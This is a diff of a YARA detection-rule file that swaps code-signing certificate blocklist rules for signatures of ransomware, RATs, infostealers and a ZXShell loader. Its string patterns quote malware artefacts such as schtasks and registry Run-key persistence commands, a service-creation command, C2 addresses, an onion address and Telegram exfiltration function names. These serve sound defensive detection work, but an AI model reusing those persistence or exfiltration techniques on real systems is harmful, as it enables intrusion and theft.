+		$s4 = "Thread %d started." fullword ascii
+		$s5 = "ADD our TOXID:" wide
+		$s6 = "[Recommended] Using an email" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" )
+		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $s* ) and 1 of ( $c* ) ) or ( 2 of ( $s* ) and ( #c1 > 5 or #c2 > 5 or #c3 > 5 or #c5 > 5 ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : FILE
+rule DITEKSHEN_MALWARE_Win_Timetime : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TimeTime ransomware"
 		author = "ditekSHen"
-		id = "be18fe1a-f810-5153-b565-97a0e33cf406"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3542-L3553"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9311-L9327"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5f7f23d9ba35bed3540233217e18b84c5ac0528fd3fe809c162fce6ccce0791"
+		logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "84b5ef4f981020df2385754ab1296821fa2f8977"
-		importance = 20
+
+	strings:
+		$s1 = "@_DECRYPTOR_@" ascii wide
+		$s2 = "@__RECOVER_YOUR_FILES__@" wide
+		$s3 = "\\TimeTime.pdb" ascii
+		$s4 = "runCommand" fullword ascii
+		$s5 = "decryptor_file_name" fullword ascii
+		$s6 = "encryption_hiding_process" fullword ascii
+		$s7 = "admin_hiding_process" fullword ascii
+		$s8 = "security_vaccine" fullword ascii
+		$s9 = "EncrFiles_Load" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_62B80Fc5E1C02072019C88Ee356152C1 : FILE
+rule DITEKSHEN_MALWARE_Win_Strifewater : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects StrifeWater RAT"
 		author = "ditekSHen"
-		id = "08db7669-c3d6-5f27-988e-96e9fc0a60f3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3555-L3566"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9329-L9354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c06e31f5a071ff7c87af216d22bffa2970372fa341ad2593ef0c3c6a71dac945"
+		logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0a83c0f116020fc1f43558a9a08b1f8bcbb809e0"
-		importance = 20
+
+	strings:
+		$s1 = "example/1.0" fullword wide
+		$s2 = "coname:" fullword ascii
+		$s3 = "*elev:" fullword ascii
+		$s4 = "*uname:" fullword ascii
+		$s5 = "--BoundrySign" ascii
+		$s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii
+		$s7 = "9c4arSBr32g6IOni" fullword ascii
+		$pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii
+		$xn1 = "techzenspace.com" fullword wide
+		$xn2 = "87.120.8.210" wide
+		$xn3 = "192.168.40.27" wide
+		$n1 = /RVP\/index\d+\.php/ fullword wide
+		$n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii
+		$n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii
+		$n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii
+		$n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii
+		$n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
+		$n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Inversum" and pe.signatures [ i ] . serial == "62:b8:0f:c5:e1:c0:20:72:01:9c:88:ee:35:61:52:c1" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $xn* ) or 6 of ( $s* ) or 6 of ( $n* ) or ( 1 of ( $xn* ) and 4 of them ) or ( $pdb and 4 of them ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F0E150C304De35F2E9086185581F4053 : FILE
+rule DITEKSHEN_MALWARE_Win_Surtr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Surtr ransomware. Ransom note is similar to LockFile"
 		author = "ditekSHen"
-		id = "d2a5cd5b-1e4a-5714-bff2-08f2c958cd0b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7a31415d-5c03-5537-9adb-65e637f9fa0e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3581-L3592"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9356-L9378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fe3d5d57d0a98414e3e4f35248d3ebf64617c16a4119a21883c3679b06146745"
+		logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c0a448b9101f48309a8e5a67c11db09da14b54bb"
-		importance = 20
+
+	strings:
+		$s1 = "<title>SurtrRansomware</title>" ascii
+		$s2 = "<HTA:APPLICATION ID=\"SurtrRansomware\"" ascii
+		$s3 = "APPLICATIONNAME=\"SurtrRansomware\"" ascii
+		$s4 = "src=\"data:image/jpeg; base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wCEAAgICAgJCAkKCgkNDgwODRMREBARExwUFhQWFBwrGx8bGx8bKyYuJSMlLiZENS8v" ascii
+		$s5 = "4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion" ascii
+		$s6 = "schtasks /CREATE /SC ONLOGON /TN svchos" wide
+		$s7 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"svchos" ascii
+		$s8 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ /v \"svchos" ascii
+		$s9 = "SURTR_README.txt" wide
+		$s10 = "surtr-decrypt.top" ascii
+		$s11 = /(Public|Private|ID)_DATA\.surt/ wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rare Ideas, LLC" and pe.signatures [ i ] . serial == "f0:e1:50:c3:04:de:35:f2:e9:08:61:85:58:1f:40:53" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A1A3E7280E0A2Df12F84309649820519 : FILE
+rule DITEKSHEN_MALWARE_Win_Udprat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects UDPRat"
 		author = "ditekSHen"
-		id = "71ad82d6-e45e-52a9-b1ff-f00cfe7b5186"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "938fc9fd-4f08-5c23-8583-06083d2efe59"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3594-L3605"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9380-L9395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c656fa5a6671f717cda5433c8780d308f11b7937e5ff66b4f3f74623b217365"
+		logic_hash = "4606b304d179148c6e44a0a8329675f2823f862a0944284cb646e5910659ea7c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "33d254c711937b469d1b08ef15b0a9f5b4d27250"
-		importance = 20
+
+	strings:
+		$s1 = "\\code\\UDP\\Client\\" ascii
+		$s2 = "ssdp:discover" ascii
+		$s3 = ": Device:" ascii
+		$s4 = "for the SNMP U encountered" ascii
+		$s5 = "privat:InternetGatewayelink" fullword ascii
+		$s6 = "schemas A jet error was" ascii
+		$s7 = "msidentity" fullword ascii
+		$s8 = "microsoftonliser-based Securi" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nir Sofer" and pe.signatures [ i ] . serial == "a1:a3:e7:28:0e:0a:2d:f1:2f:84:30:96:49:82:05:19" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Fb984D5A7296Ba74445C23Ead7D20Aa : FILE
+rule DITEKSHEN_MALWARE_Win_Jesterstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects JesterStealer"
 		author = "ditekSHen"
-		id = "1e290f81-11ab-5d5f-ab7a-c703c875bde4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7b07061f-97a4-5158-8084-46ccf212f6be"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3607-L3618"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9397-L9417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff29013eb20bccbec16107404fc18b07c87ac5269b788c48a49a490271e94052"
+		logic_hash = "c84df5d3ad2bc7a75a11c07995cc034c2a92b2f6f6f6943288add9c44c57bf6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c852fc9670391ff077eb2590639051efa42db5c9"
-		importance = 20
+
+	strings:
+		$s1 = /\[(Credman|Networks|Screenshot|Vault)\]\s\{0\}/ fullword wide
+		$s3 = "encoding=\"base64\"" fullword wide
+		$s4 = "/json/list" fullword wide
+		$s5 = "/L1ghtM4n/TorProxy/" ascii wide
+		$s6 = "<EnumerateCredentials>" ascii
+		$s7 = "<EnumerateBrowsers>" ascii
+		$s8 = "<PerformSelfDestruct>" ascii
+		$s9 = "<get_GrabberCount>" ascii
+		$s10 = "AnalyzeData" fullword ascii
+		$s11 = "CheckCard" fullword ascii
+		$s12 = "CreateGrabberZipPath" fullword ascii
+		$s13 = "Jester" fullword ascii
+		$s14 = /Stealer\.(Recovery|Grabber|Investigation)\./ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DrWeb Digital LLC" and pe.signatures [ i ] . serial == "1f:b9:84:d5:a7:29:6b:a7:44:45:c2:3e:ad:7d:20:aa" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C314A8736F82C411B9F02076A6Db4771 : FILE
+rule DITEKSHEN_MALWARE_Win_Soranostealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SoranoStealer / HogGrabber. Available on Github: /Alexuiop1337/SoranoStealer"
 		author = "ditekSHen"
-		id = "0a8af16c-f232-5e09-9825-0e8203ba7b45"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2fc40a73-5f28-5b5c-938a-35e8336e1d11"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3620-L3631"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9419-L9443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8aa08c4d1da62d0629db6e29f7a730da3534f114620e30f8d89e5475c12f43de"
+		logic_hash = "27c9d6bf3f40f3d41c35975e856671fafcd4a0a8143b3bcbdff61c1fb28a37ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9c49d7504551ad4ddffad206b095517a386e8a14"
-		importance = 20
+
+	strings:
+		$x1 = "OiCuntJollyGoodDayYeHavin_" ascii
+		$x2 = { 00 56 4d 50 72 6f 74 65 63 74 00 52 65 61 63 74
+                6f 72 00 64 65 34 66 75 63 6b 79 6f 75 00 42 61
+                62 65 6c 4f 62 66 75 73 63 61 74 6f 72 41 74 74
+                72 69 62 75 74 65 00 43 72 79 74 70 6f 4f 62 66
+                75 73 63 61 74 6f 72 00 }
+		$x3 = { 00 4f 62 66 75 73 63 61 74 65 64 42 79 47 6f 6c
+                69 61 74 68 00 42 65 64 73 2d 50 72 6f 74 6f 72 00 }
+		$s1 = ".Binaries.whysosad" ascii
+		$s2 = "Adminstrator permissons are required" wide
+		$s3 = "12:03:33:4A:04:AF" fullword wide
+		$s4 = "RemoveEXE" fullword ascii
+		$s5 = "$340becfa-1688-4c32-aa49-30fdb4005e4b" fullword ascii
+		$s6 = "$99cffbcc-6ad7-4d32-bd1f-450967cf4a6b" fullword ascii
+		$s7 = "\"cam\": " ascii
+		$s8 = " - 801858595527371999762718088" fullword ascii
+		$s9 = "  - 96188142294460126639341306" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbcbaeaabbfcebfcbbeeffeadfc" and pe.signatures [ i ] . serial == "c3:14:a8:73:6f:82:c4:11:b9:f0:20:76:a6:db:47:71" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5F7Ef778D51Cd33A5Fc0D2E035Ccd29D : FILE
+rule DITEKSHEN_MALWARE_Win_Gloomanestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GloomaneStealer"
 		author = "ditekSHen"
-		id = "95b1cba9-9625-55da-a321-08cdd4d3056f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6e3c7e8f-4b75-5198-aa41-076f29aac227"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3633-L3644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9445-L9461"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b57fd9840dceea97a2f013f803e8639add6c6b01f3764b65b3c1fe60ae0dd57"
+		logic_hash = "36aa9f863efb8172ed6449932169e6cb26cdeedd84bc734e09a8116a9c7774ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "87229a298b8de0c7b8d4e23119af1e7850a073f5"
-		importance = 20
+
+	strings:
+		$x1 = "=GLOOMANE STEALER=" wide
+		$x2 = "Maded by GLOOMANE" wide
+		$s1 = "\\44CALIBER" ascii
+		$s2 = "Ethernet()" fullword wide
+		$s3 = ":spy: NEW LOG FROM" wide
+		$s4 = ":eye: IP:" wide
+		$s5 = ":file_folder: Grabbed Files" wide
+		$s6 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
+		$s7 = "$3b0e2d3d-3d66-42bb-8f9c-d6e188f359ae" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffadbcfabbe" and pe.signatures [ i ] . serial == "5f:7e:f7:78:d5:1c:d3:3a:5f:c0:d2:e0:35:cc:d2:9d" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ab1D5E43E4Dde77221381E21A764C082 : FILE
+rule DITEKSHEN_MALWARE_Win_Lockdown : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Lockdown / cantopen ransomware"
 		author = "ditekSHen"
-		id = "55135b31-93d7-512f-8506-51e49bc3dc92"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "793df99d-016a-5f96-9ff9-76d3f08e0dd2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3646-L3657"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9463-L9476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3746c3494dca7fd2e0c7ab6641fe9ebbb8519df755022a3bde99c192158e4299"
+		logic_hash = "a9bc2f514730703f3edf78a61f1bc357eee12b3289fc7491197c3b885286ca7e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "b84a817517ed50dbae5439be54248d30bd7a3290"
-		importance = 20
+
+	strings:
+		$s1 = "BgIAAACkAABSU0E" wide
+		$s2 = ".cantopen" fullword wide
+		$s3 = "\\HELP_DECRYPT_YOUR_FILES.txt" wide
+		$s4 = "SALT" fullword wide
+		$s5 = "$4e677664-9a63-458e-a365-deb792509557" fullword ascii
+		$s6 = "CreateEncryptor" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadddbffbfcbdaaeeccecbbffac" and pe.signatures [ i ] . serial == "00:ab:1d:5e:43:e4:dd:e7:72:21:38:1e:21:a7:64:c0:82" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4743E140C05B33F0449023946Bd05Acb : FILE
+rule DITEKSHEN_MALWARE_Win_Unamedstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown infostealer. Observed as 2nd stage and injects into .NET AppLaunch.exe"
 		author = "ditekSHen"
-		id = "f3e8046a-0df7-5a67-a363-02961ec1545b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cb3d575b-3d53-5b89-abc1-3b3857ec9f46"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3659-L3670"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9478-L9494"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be8764a008743f8ca8c1a5760c5daa7f6896c8710f5f79f9d5b42b07ef0d5fa8"
+		logic_hash = "84f4ac7489a0d522763f69ce55f816642a8511dc4b9698ce47c983020a2b7bea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7b32c8cc35b86608c522a38c4fe38ebaa57f27675504cba32e0ab6babbf5094a"
-		importance = 20
+
+	strings:
+		$s1 = "HideMelt" fullword ascii
+		$s2 = ".Implant" ascii
+		$s3 = "SetUseragent" fullword ascii
+		$s4 = "SendReport" fullword ascii
+		$s5 = "cookiesList" fullword ascii
+		$s6 = "WriteAppsList" fullword ascii
+		$s7 = "Timeout /T 2 /Nobreak" fullword wide
+		$s8 = "Directory not exists" wide
+		$s9 = "### {0} ### ({1})" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2C1Ee9B583310B5E34A1Ee6945A34B26 : FILE
+rule DITEKSHEN_MALWARE_Win_Zxshell_Loader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ZXShell kernel driver loader"
 		author = "ditekSHen"
-		id = "0cc94ceb-a5bf-511a-bcd0-136b5d35c348"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c55c718b-6af3-5d3b-aa1c-369319fca603"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3672-L3683"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9496-L9544"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4891757929b64b45591792dd2526ffb7588345f76bcbd3e47f567e72ba03d7f2"
+		logic_hash = "b20350af231e0c329423c71d8f099305ed447d2ffcb7a533b7531dc9f5357b93"
 		score = 75
-		quality = 75
+		quality = 57
 		tags = "FILE"
-		thumbprint = "7af96a09b6c43426369126cfffac018f11e5562cb64d32e5140cff3f138ffea4"
-		importance = 20
+		hash1 = "a6020794bd6749e0765966cd65ca6d5511581f47cc2b38e41cb1e7fddaa0b221"
+
+	strings:
+		$s1 = "KillAvpProcess" ascii wide nocase
+		$s2 = "ProtectDllFile" ascii wide nocase
+		$s3 = "LoadSys" ascii wide nocase
+		$s4 = "CallDriver" ascii wide nocase
+		$s5 = "DoRVA" fullword ascii wide
+		$s6 = "TdiProxy" ascii
+		$s7 = "res.ini" fullword ascii
+		$s8 = "res.dat" fullword ascii
+		$s9 = "google64.p" fullword ascii
+		$s10 = "google32.p" fullword ascii
+		$s11 = "OneSelfKey" fullword ascii
+		$x1 = "antiscan" ascii
+		$x2 = "removeprocessnotify" ascii
+		$x3 = "setprocessnotify" ascii
+		$x4 = "antiantigp" ascii
+		$x5 = "hideproc" ascii
+		$x6 = "hidekey" ascii
+		$x7 = "hidefile" ascii
+		$x8 = "sc create %s binpath= \"%%SystemRoot%%\\System32\\svchost.exe -k %s\" type= share start= auto" fullword ascii
+		$m1 = "St4rtServ1ce" ascii
+		$m2 = "ch3ck dr1ver failed" ascii
+		$m3 = "L0ad dr1ver failed" ascii
+		$m4 = "Write Dr1ver Failed" ascii
+		$m5 = "over writed succ3ssfully" ascii
+		$m6 = "can k1ll the pr0cessId" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $m* ) or 5 of ( $s* ) or 5 of ( $x* ) or ( 3 of ( $s* ) and 3 of ( $x* ) ) or ( 2 of ( $s* ) and 1 of ( $x* ) and 1 of ( $m* ) ) or ( pe.exports ( "KillAvpProcess" ) and pe.exports ( "ProtectDllFile" ) and pe.exports ( "LoadSys" ) ) or ( 3 of them and ( pe.exports ( "KillAvpProcess" ) or pe.exports ( "ProtectDllFile" ) or pe.exports ( "LoadSys" ) or pe.exports ( "CallDriver" ) or pe.exports ( "DoRVA" ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D338F8A490E37E6C2Be80A0E349929Fa : FILE
+rule DITEKSHEN_MALWARE_Win_Bandit : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Bandit Infostealer"
 		author = "ditekSHen"
-		id = "5bb542de-637f-58a4-b96a-f20dba7be1b7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "06866232-bd40-5bbc-9f08-3892193b5f36"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3685-L3696"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9546-L9582"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed7a48df55f2d7873795470b9074421f4008d715db07978c79b174fc3f2a801a"
+		logic_hash = "e557f5a928b5da90f3ec878d6d8615a2d8b5f33e97954cd3278044f76b543386"
 		score = 75
-		quality = 75
+		quality = 57
 		tags = "FILE"
-		thumbprint = "480a9ce15fc76e03f096fda5af16e44e0d6a212d6f09a898f51ad5206149bbe1"
-		importance = 20
+
+	strings:
+		$x1 = "@Banditshopbot" ascii
+		$x2 = "BANDIT STEALER" ascii
+		$x3 = "Banditstealer" ascii
+		$n1 = "bandit/browsers." ascii
+		$n2 = "bandit/crypto." ascii
+		$n3 = "bandit/decrypt." ascii
+		$n4 = "bandit/messenger." ascii
+		$n5 = "bandit/userdata." ascii
+		$n6 = "bandit/utils." ascii
+		$f1 = "main.sendZipToTelegram" fullword ascii
+		$f2 = "main.killProcessHoldingFileHandle" fullword ascii
+		$f3 = "main.killProcessByName" fullword ascii
+		$f4 = "main.killProcessesHoldingFile" fullword ascii
+		$f5 = "main.deleteDir" fullword ascii
+		$f6 = "main.deleteUserDataDirs" fullword ascii
+		$path = /bandit\/(browsers|common|crypto|messenger|userdata|utils)\/(browsers|common|crypto|messenger|userdata|utils)\.go/ ascii
+		$m1 = "banditbot" ascii wide nocase
+		$m2 = "blackListedIPS = [" ascii wide nocase
+		$m3 = "blackListedPCNames = [" ascii wide nocase
+		$m4 = "blackListedMacs = [" ascii wide nocase
+		$m5 = "blacklisted_hwids = [" ascii wide nocase
+		$m6 = "blacklisted_users = [" ascii wide nocase
+		$m7 = "blacklisted_processes = [" ascii wide nocase
+		$s1 = "User-AgentVirtualBox" ascii
+		$s2 = "%s%sBinanceChainWallet" ascii
+		$s3 = "coinbaseWalletcontent-lengthdata" ascii
+		$s4 = "coinbaseWalletExtensioncommand" ascii
+		$s5 = "\\s+pid:\\s+(\\d+)\\s+" ascii
+		$s6 = "/user:Administrator" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $n* ) or 5 of ( $f* ) or ( $path and ( 1 of ( $n* ) or 1 of ( $f* ) ) ) or ( 1 of ( $x* ) and ( 1 of ( $n* ) or 1 of ( $f2* ) ) ) or 6 of ( $m* ) or ( all of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_778906D40695F65Ba518Db760Df44Cd3 : FILE
+rule DITEKSHEN_MALWARE_Win_Laplas : FILE
 {
 	meta:
